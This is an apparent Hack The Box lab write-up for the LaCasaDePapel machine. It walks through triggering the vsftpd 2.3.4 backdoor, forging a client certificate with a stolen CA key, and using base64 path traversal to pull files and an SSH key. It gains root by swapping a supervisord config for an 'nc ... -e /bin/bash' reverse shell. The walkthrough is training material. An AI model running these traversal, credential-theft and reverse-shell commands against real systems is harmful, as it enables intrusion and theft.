LaCasaDePapel
Ports scan
u505@kali:~/HTB/Machines/LaCasaDePapel$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.131 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-20 18:02:41 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 21/tcp on 10.10.10.131
Discovered open port 443/tcp on 10.10.10.131
Discovered open port 22/tcp on 10.10.10.131

u505@kali:~/HTB/Machines/LaCasaDePapel$ nmap -sC -sV 10.10.10.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 13:09 EST
Nmap scan report for lacasadepapel.htb (10.10.10.131)
Host is up (0.038s latency).
Not shown: 914 closed ports, 82 filtered ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp  open  http     Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open  ssl/http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: La Casa De Papel
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|   http/1.1
|_  http/1.0
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.70 seconds
Port 80
The page asks for a Google Authenticator token and an email address. Once they are provided, the page informs us that we need to follow the instructions sent to our mailbox.
Port 443
The HTTPS site requires a client certificate before it serves anything.
Port 21
The FTP server is vsftpd 2.3.4, well known for its backdoor.
u505@kali:~/HTB/Machines/LaCasaDePapel$ searchsploit vsftp 2.3.4
---------------------------------------------- ----------------------------------------
 Exploit Title                                | Path
                                              | (/usr/share/exploitdb/)
---------------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Me | exploits/unix/remote/17491.rb
---------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/LaCasaDePapel$ searchsploit -m 17491.rb
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/17491
     Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/LaCasaDePapel/17491.rb
The backdoor payload is interesting: in response to a :) smiley face in the FTP username, a TCP callback shell is attempted. Metasploit can send the payload too, but doesn't get a shell.
u505@kali:~/HTB/Machines/LaCasaDePapel$ nc lacasadepapel.htb 6200
Ncat: Connection refused.
u505@kali:~/HTB/Machines/LaCasaDePapel$ ftp lacasadepapel.htb
Connected to lacasadepapel.htb.
220 (vsFTPd 2.3.4)
Name (lacasadepapel.htb:u505): u505:)
331 Please specify the password.
Password: dsdfs
^C
421 Service not available, remote server has closed connection
u505@kali:~/HTB/Machines/LaCasaDePapel$ nc lacasadepapel.htb 6200
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
Instead of a bash shell we get a Psy Shell (this is why Metasploit was unable to open a shell).
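As an added example (not part of this writeup), here is the detection side of the trigger described above: it scans FTP server log lines for a username containing ":)" and checks socket listings for a listener on port 6200, the port the backdoor opened on this box. The log and socket lines are constructed, and their formats (vsftpd.log style and ss -lntp style) are assumptions.

```javascript
// Added example, not from the writeup: detect the vsftpd 2.3.4 backdoor trigger
// from the defender's side. Two signals are checked:
//  1. an FTP login whose username contains ":)" (the backdoor trigger), and
//  2. a LISTEN socket on TCP 6200, the port the backdoor opens.
// The log and socket lines below are constructed; their formats are assumed.
const SAMPLE_LOG = `Thu Feb 20 18:05:10 2020 [pid 2011] CONNECT: Client "10.10.14.6"
Thu Feb 20 18:05:19 2020 [pid 2010] [u505:)] FAIL LOGIN: Client "10.10.14.6"
Thu Feb 20 18:06:02 2020 [pid 2030] CONNECT: Client "10.10.14.9"
Thu Feb 20 18:06:05 2020 [pid 2029] [anonymous] OK LOGIN: Client "10.10.14.9"
Thu Feb 20 18:07:44 2020 [pid 2051] [smile:)face] FAIL LOGIN: Client "10.10.14.12"`;

const SAMPLE_SS = `LISTEN 0 32 0.0.0.0:21 0.0.0.0:* users:(("vsftpd",pid=1999,fd=3))
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=1500,fd=3))
LISTEN 0 1 0.0.0.0:6200 0.0.0.0:* users:(("vsftpd",pid=2010,fd=5))`;

// Login line: timestamp, [pid N], [username], OK|FAIL LOGIN, client IP.
// The lazy group keeps a ":)" (or any other odd character) inside the username.
const LOGIN_RE = /^(\S+ \S+ +\d+ [\d:]+ \d+) \[pid \d+\] \[(.+?)\] (OK|FAIL) LOGIN: Client "([\d.]+)"$/;

// Returns one record per login attempt whose username carries the trigger.
function findBackdoorTriggers(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    const m = LOGIN_RE.exec(line.trim());
    if (!m) continue;                       // CONNECT and other events
    const [, ts, user, , client] = m;
    if (user.includes(':)')) hits.push({ ts, user, client });
  }
  return hits;
}

// Returns LISTEN sockets bound to port 6200 with the owning process name, so a
// vsftpd process listening there can be correlated with the log hits above.
function findBackdoorListener(ssText) {
  return ssText.split('\n')
    .filter(l => /^LISTEN\b/.test(l) && /:6200\s/.test(l))
    .map(l => {
      const proc = /\("([^"]+)"/.exec(l);
      return { line: l.trim(), proc: proc ? proc[1] : null };
    });
}
```

The remedy on a real host is to reinstall vsftpd from a clean package rather than the backdoored 2.3.4 tarball.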
Psy shell
With PHP functions we can explore the server's filesystem.
scandir("/home");
=> [
".",
"..",
"berlin",
"dali",
"nairobi",
"oslo",
"professor",
]
...
scandir("/home/berlin");
=> [
".",
"..",
".ash_history",
".ssh",
"downloads",
"node_modules",
"server.js",
"user.txt",
]
echo readfile("/home/berlin/user.txt");
PHP Warning:  readfile(/home/berlin/user.txt): failed to open stream: Permission denied in phar://eval()'d code on line 1
The user flag is in berlin's home directory, but we cannot read it.
scandir("/home/dali/.ssh");
=> [
".",
"..",
"authorized_keys",
"known_hosts",
]
readfile("/home/dali/.ssh/authorized_keys");
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw== thek@ThekMac.local
=> 400
User dali authorizes SSH access with a private key.
scandir ("/home/nairobi");
=> [
".",
"..",
"ca.key",
"download.jade",
"error.jade",
"index.jade",
"node_modules",
"server.js",
"static",
]
readfile("/home/nairobi/ca.key");
-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----
=> 1704
We found a private key named ca.key. Perhaps it belongs to the certificate authority?
scandir("/home/oslo/Maildir/.Sent/cur");
=> [
".",
"..",
"1582228357085.M22583P98548V0000000000068519I00000000018a624.lacasadepapel.htb,S=430,2,S",
]
readfile("/home/oslo/Maildir/.Sent/cur/1582228357085.M22583P98548V0000000000068519I00000000018a624.lacasadepapel.htb,S=430,2,S");
Content-Type: text/plain; format=flowed
From: dali@lacasadepapel.htb
To: 505559U@gmail.com
Content-Transfer-Encoding: 7bit
Date: Thu, 20 Feb 2020 19:52:37 +0000
Message-Id: <1582228357097-cf67b847-00a5d654-9b60e918@lacasadepapel.htb>
MIME-Version: 1.0

Welcome to our community!
Thanks for signing up. To continue, please verify your email address by clicking the url below.
https://lacasadepapel.htb/8b47e8d0-541a-11ea-b783-f7248254501e
=> 453
The mail was for us. We follow the link.
The link lets us download ca.crt (the CA certificate). We can check whether the certificate authority of the web site is the same as the ca.key we found in nairobi's folder by comparing the public keys.
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -noout -pubkey -in ca.crt
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl rsa -in ca.key -pubout
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----
The public keys match, so we have the certificate authority of the web site.
Client certificate creation
Private key
First we generate our own private key.
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl genrsa -out u505.key 2048
Generating RSA private key, 2048 bit long modulus (2 primes)
...........................................+++++
..........................................................................................................................................+++++
e is 65537 (0x010001)
Certificate request
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl req -new -key u505.key -out u505.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:BE
State or Province Name (full name) [Some-State]:BXL
Locality Name (eg, city) []:BXL
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Luniel
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:u505
Email Address []:505559U@gmail.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Sign our certificate with the CA
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -req -days 3650 -in u505.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out u505.crt
Signature ok
subject=C = BE, ST = BXL, L = BXL, O = Luniel, CN = u505, emailAddress = 505559U@gmail.com
Getting CA Private Key
We check the signed certificate:
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -text -noout -in u505.crt
Certificate:
Data:
Version: 1 (0x0)
Serial Number:
1f:67:d2:c3:74:04:a1:fc:ea:df:11:59:c0:3a:96:f8:ca:50:2c:86
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = lacasadepapel.htb, O = La Casa De Papel
Validity
Not Before: Feb 21 13:31:54 2020 GMT
Not After : Feb 18 13:31:54 2030 GMT
Subject: C = BE, ST = BXL, L = BXL, O = Luniel, CN = u505, emailAddress = 505559U@gmail.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c1:2c:83:5c:67:85:a3:da:e5:cd:f0:05:45:12:
e2:4e:99:11:cf:b4:f6:97:b8:58:93:2d:d1:72:de:
28:0e:4d:0d:80:23:4e:c2:48:c5:23:48:0a:8b:4c:
4a:c0:e1:36:af:81:ae:dc:ac:cb:e3:a2:e5:2f:00:
44:e6:59:5a:58:6c:c0:fd:ea:cc:52:0e:de:c6:5e:
37:77:eb:d6:df:9f:c8:fe:14:92:90:ad:f6:d2:03:
04:ad:6a:c2:44:e7:2c:31:1d:12:d7:a7:14:4b:16:
71:0f:bf:c6:74:9a:9e:2f:1e:b8:3f:8a:37:df:83:
8c:bc:d9:c4:12:62:96:ae:19:b1:f9:02:c7:7b:0c:
85:92:c7:a7:b2:94:2b:77:5b:ae:8c:39:a7:bc:4e:
91:bd:fb:15:7e:da:5c:95:2b:87:61:1c:e7:fe:45:
57:98:ac:fc:db:4a:b8:61:93:62:db:cf:35:5e:ea:
ad:4f:9d:52:df:0c:9d:b8:99:8c:c5:6f:ce:f8:c3:
b0:b8:6b:36:fc:c2:d4:c3:a7:7d:aa:34:e7:c0:45:
f8:7c:6f:17:7b:6c:c6:ee:69:e7:b4:03:77:de:4f:
2a:12:7d:7d:2c:f1:75:45:c1:41:f5:3c:00:41:e8:
a6:e7:a9:c4:72:ba:e0:4d:e2:4f:01:3c:72:d1:61:
08:d9
Exponent: 65537 (0x10001)
Signature Algorithm: sha256WithRSAEncryption
ab:4b:d1:d9:e4:11:ed:20:21:04:05:f9:db:84:c8:76:0a:74:
c3:04:34:5f:6a:c1:4d:0b:bd:73:86:cf:5c:cb:b6:ad:88:e7:
ae:00:2c:a6:2a:09:1e:0a:f2:f9:37:ab:68:38:54:2b:03:cf:
98:df:28:ec:cc:6b:a0:b4:85:a1:f1:cd:98:49:58:e3:91:85:
47:19:72:95:86:d1:29:36:f8:74:66:b4:ac:a8:a5:47:04:24:
e8:fa:fe:0d:88:98:5a:e3:be:23:22:3d:42:51:a0:00:b5:83:
97:5c:be:14:bc:bb:ec:1b:83:27:1a:f3:b9:2b:04:53:ac:4d:
65:1f:8e:e6:b2:a5:4e:d9:a6:5c:5b:1d:7c:ed:11:cc:7d:61:
f0:1e:8f:bb:a4:2b:1b:ea:54:81:5a:9e:f5:89:b0:9d:39:50:
ea:21:18:4f:44:f8:e5:a7:9f:e8:d3:a1:e2:f4:db:58:3b:05:
3c:65:f2:67:8f:1a:a2:83:8d:dc:a9:df:f1:e8:1e:8f:ff:73:
11:20:c6:9b:62:9c:36:18:41:14:4a:0b:36:df:e9:da:63:b8:
73:44:ad:57:bf:2d:08:9d:c3:cb:b2:1a:d2:dc:50:59:07:a7:
75:90:b1:92:ec:4e:69:20:f4:60:35:f2:9a:69:e8:24:53:ca:
d8:72:64:4e
Create a PKCS#12 bundle to import into Firefox
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl pkcs12 -export -in u505.crt -inkey u505.key -out u505.pfx
Enter Export Password:
Verifying - Enter Export Password:
Import the certificate into Firefox
Open the web page with the client certificate.
Now we are able to access the "private" area of this server.
Digging into the web application
The application lists directories through the path parameter, and the file route reads a file whose name is passed in base64. For example the URL https://lacasadepapel.htb/file/U0VBU09OLTEvMDEuYXZp downloads the file:
u505@kali:~/HTB/Machines/LaCasaDePapel$ echo "U0VBU09OLTEvMDEuYXZp" | base64 -d
SEASON-1/01.avi
If we try /etc/passwd:
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "/etc/passwd" | base64`
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Error: ENOENT: no such file or directory, open '/home/berlin/downloads//etc/passwd'<br>
    at Object.fs.openSync (fs.js:646:18)<br>
    at Object.fs.readFileSync (fs.js:551:33)<br>
    at /home/berlin/server.js:32:15<br>
    at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)<br>
    at next (/home/berlin/node_modules/express/lib/router/route.js:137:13)<br>
    at Route.dispatch (/home/berlin/node_modules/express/lib/router/route.js:112:3)<br>
    at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)<br>
    at /home/berlin/node_modules/express/lib/router/index.js:281:22<br>
    at param (/home/berlin/node_modules/express/lib/router/index.js:354:14)<br>
    at param (/home/berlin/node_modules/express/lib/router/index.js:365:14)</pre>
</body>
</html>
The path is resolved relative to /home/berlin/downloads/, and the error shows the decoded name is simply appended to it.
User Flag
The URL https://lacasadepapel.htb/?path=../ shows us the user.txt file
We can download it, and retrieve the content.
u505@kali:~/HTB/Machines/LaCasaDePapel$ echo -n "../user.txt" | base64
Li4vdXNlci50eHQ=
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/Li4vdXNlci50eHQ=
<USER_FLAG>
Remote shell
Private key
In berlin's .ssh folder (https://lacasadepapel.htb/?path=../.ssh/) there is an id_rsa file.
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "../.ssh/id_rsa" | base64` --output id_rsaberlin
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3389  100  3389    0     0   5629      0 --:--:-- --:--:-- --:--:--  5620
u505@kali:~/HTB/Machines/LaCasaDePapel$ file id_rsaberlin
id_rsaberlin: OpenSSH private key
We test it:
u505@kali:~/HTB/Machines/LaCasaDePapel$ chmod 600 id_rsaberlin
u505@kali:~/HTB/Machines/LaCasaDePapel$ ssh -i id_rsaberlin berlin@lacasadepapel.htb
The authenticity of host 'lacasadepapel.htb (10.10.10.131)' can't be established.
ECDSA key fingerprint is SHA256:rA99W+GVzo0hlABp1vMj9ChhjLwybPhHTpb65AWm7xI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'lacasadepapel.htb,10.10.10.131' (ECDSA) to the list of known hosts.
berlin@lacasadepapel.htb's password:
Permission denied, please try again.
berlin@lacasadepapel.htb's password:
Permission denied, please try again.
berlin@lacasadepapel.htb's password:
berlin@lacasadepapel.htb: Permission denied (publickey,password,keyboard-interactive).
Enumerate users
We can list /home from the web page.
A better solution is to download /etc/passwd directly:
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "../../../etc/passwd" | base64`
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
memcached:x:102:102:memcached:/home/memcached:/sbin/nologin
There are not 5 real users as the /home folder suggested, but 3:
- dali
- berlin
- professor
nairobi and oslo are not real users of the system. dali is the account the vsftpd backdoor shell runs as, since its login shell is /usr/bin/psysh.
User professor
Using user professor and the private key found in berlin's folder, we get a full SSH shell with a beautiful banner :)
u505@kali:~/HTB/Machines/LaCasaDePapel$ ssh -i id_rsaberlin professor@lacasadepapel.htb

[ASCII-art banner: La Casa De Papel]

lacasadepapel [~]$ whoami
professor
Local enumeration
u505@kali:~/HTB/Machines/LaCasaDePapel$ mkdir www
u505@kali:~/HTB/Machines/LaCasaDePapel$ cd www/
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
From the target machine:
lacasadepapel [/tmp]$ wget http://10.10.14.6/LinEnum.sh
Connecting to 10.10.14.6 (10.10.14.6:80)
LinEnum.sh           100% |********************************| 46631   0:00:00 ETA
lacasadepapel [/tmp]$ wget http://10.10.14.6/pspy64
Connecting to 10.10.14.6 (10.10.14.6:80)
pspy64               100% |********************************|  3006k  0:00:00 ETA
lacasadepapel [/tmp]$ chmod +x pspy64 LinEnum.sh
Cronjob
pspy shows root restarting supervisord, which in turn launches a node script from professor's home directory:
2020/02/22 13:44:00 CMD: UID=0 PID=6625 | /sbin/openrc-run /etc/init.d/supervisord restart
2020/02/22 13:44:00 CMD: UID=0 PID=6624 | /sbin/openrc-run /etc/init.d/supervisord restart
2020/02/22 13:44:01 CMD: UID=0 PID=6627 | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord stop
2020/02/22 13:44:01 CMD: UID=0 PID=6642 | start-stop-daemon --stop --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid
2020/02/22 13:44:01 CMD: UID=0 PID=6650 | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0 PID=6649 | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0 PID=6652 |
2020/02/22 13:44:01 CMD: UID=0 PID=6664 | start-stop-daemon --start --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid --background --make-pidfile -- --nodaemon --pidfile /var/run/supervisord.pid --configuration /etc/supervisord.conf
2020/02/22 13:44:01 CMD: UID=0 PID=6665 | start-stop-daemon --start --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid --background --make-pidfile -- --nodaemon --pidfile /var/run/supervisord.pid --configuration /etc/supervisord.conf
2020/02/22 13:44:01 CMD: UID=0 PID=6668 | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0 PID=6672 | /usr/bin/python2 /usr/bin/supervisord --nodaemon --pidfile /var/run/supervisord.pid --configuration /etc/supervisord.conf
2020/02/22 13:44:02 CMD: UID=0 PID=6673 | sudo -u nobody /usr/bin/node /home/professor/memcached.js
We cannot read /etc/supervisord.conf:
lacasadepapel [~]$ cat /etc/supervisord.conf
cat: can't open '/etc/supervisord.conf': Permission denied
lacasadepapel [~]$ ls -l /etc/supervisord.conf
-rw------- 1 root root 313 Jan 29 2019 /etc/supervisord.conf
We cannot read /home/professor/memcached.js either, but we can read a file next to it.
lacasadepapel [~]$ ls -ltr
total 12
-rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js
-rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini
drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
The ini file contains the sudo command that the cronjob runs through supervisord.
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
Privilege escalation
Start a listener
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Change memcached.ini
The file is read-only for us, but it sits in professor's home directory, which professor owns and can write to.
lacasadepapel [~]$ ls -lta
total 24
drwxr-sr-x 4 professo professo 4096 Mar 6 2019 .
drwxr-xr-x 7 root root 4096 Feb 16 2019 ..
drwx------ 2 professo professo 4096 Jan 31 2019 .ssh
drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
-rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null
So we are allowed to rename the file, even though root owns it.
lacasadepapel [~]$ mv memcached.ini memcached.ini.org
And we can create our own file in its place:
lacasadepapel [~]$ vi memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = nc 10.10.14.6 4444 -e /bin/bash
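An added example (not from the writeup) that encodes this check for the defender: it parses an ls -la listing, constructed here from the one shown above, and reports entries that the directory's owner could rename away even though another user owns them.

```javascript
// Added example, not from the writeup: parse an `ls -la` listing and report
// entries that the directory's owner can rename or replace although another
// user owns them. That is the memcached.ini situation above: a root-owned file
// inside a directory owned and writable by professor. The sticky bit would not
// change this, because it never restricts the directory's own owner.
// LISTING is constructed from the /home/professor listing shown above.
const LISTING = `total 24
drwxr-sr-x 4 professo professo 4096 Mar 6 2019 .
drwxr-xr-x 7 root root 4096 Feb 16 2019 ..
drwx------ 2 professo professo 4096 Jan 31 2019 .ssh
drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
-rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null`;

// mode links owner group size month day year-or-time name [-> target]
const LINE_RE = /^([-dl][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+?)(?: -> .*)?$/;

function parseListing(text) {
  const entries = [];
  for (const line of text.split('\n')) {
    const m = LINE_RE.exec(line.trim());
    if (!m) continue;                                   // "total N", blank lines
    entries.push({ mode: m[1], owner: m[2], group: m[3], name: m[4] });
  }
  return entries;
}

// The owner write bit is the third character of the mode string (d rwx r-s r-x).
function ownerWritable(mode) { return mode[2] === 'w'; }

// Names of entries the directory owner could rename away. The "." entry
// describes the directory itself; a root-owned directory is not a finding.
function findReplaceable(text) {
  const entries = parseListing(text);
  const dir = entries.find(e => e.name === '.');
  if (!dir || dir.owner === 'root' || !ownerWritable(dir.mode)) return [];
  return entries
    .filter(e => e.name !== '.' && e.name !== '..' && e.owner !== dir.owner)
    .map(e => e.name);
}
```

The fix for this case is to keep the supervisord program definition under /etc, owned and writable by root only, instead of in a user's home directory.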
Reverse shell
Once the cronjob has run, we get the reverse shell:
u505@kali:/home$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.131.
Ncat: Connection from 10.10.10.131:34955.
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"
Root flag
bash-4.4# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>
References
- https://pastebin.com/AetT9sS5
- Alert: vsftpd download backdoored
- A runtime developer console, interactive debugger and REPL for PHP.
Daniel Simao 13:00, 20 February 2020 (EST)